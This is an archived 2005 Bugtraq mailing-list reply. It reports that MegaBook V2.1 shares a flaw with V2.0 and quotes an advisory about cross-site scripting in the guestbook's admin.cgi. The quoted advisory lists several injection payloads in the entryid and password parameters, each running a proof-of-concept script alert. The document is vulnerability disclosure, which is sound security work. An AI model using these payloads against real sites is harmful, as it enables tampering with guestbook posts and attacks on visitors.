In-Reply-To: <20050505104551.23441.qmail@xxxxxxxxxxxxxxxxxxxxx> The same vulnerability also exist in the new version of MegaBook V2.1 >Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27) > by mail.securityfocus.com with SMTP; 5 May 2005 17:31:03 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing3.securityfocus.com (Postfix) with QMQP > id 8A54C237664; Thu, 5 May 2005 09:22:24 -0600 (MDT) >Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx> >List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx> >List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx> >Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx >Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx >Received: (qmail 20731 invoked from network); 5 May 2005 03:18:37 -0000 >Date: 5 May 2005 10:45:51 -0000 >Message-ID: <20050505104551.23441.qmail@xxxxxxxxxxxxxxxxxxxxx> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: Spy Hat <spyhat@xxxxxxxxxx> >To: bugtraq@xxxxxxxxxxxxxxxxx >Subject: MegaBook V2.0 - Cross Site Scripting Exploit > > > >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi > >URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) > >I have tested the script with the following query: > >?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script> > >I have also tested the script with theses POST variables: > >action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script> > >action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script> > >action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script> > >action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script> > >action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script> > > >Yours, >SpyHat >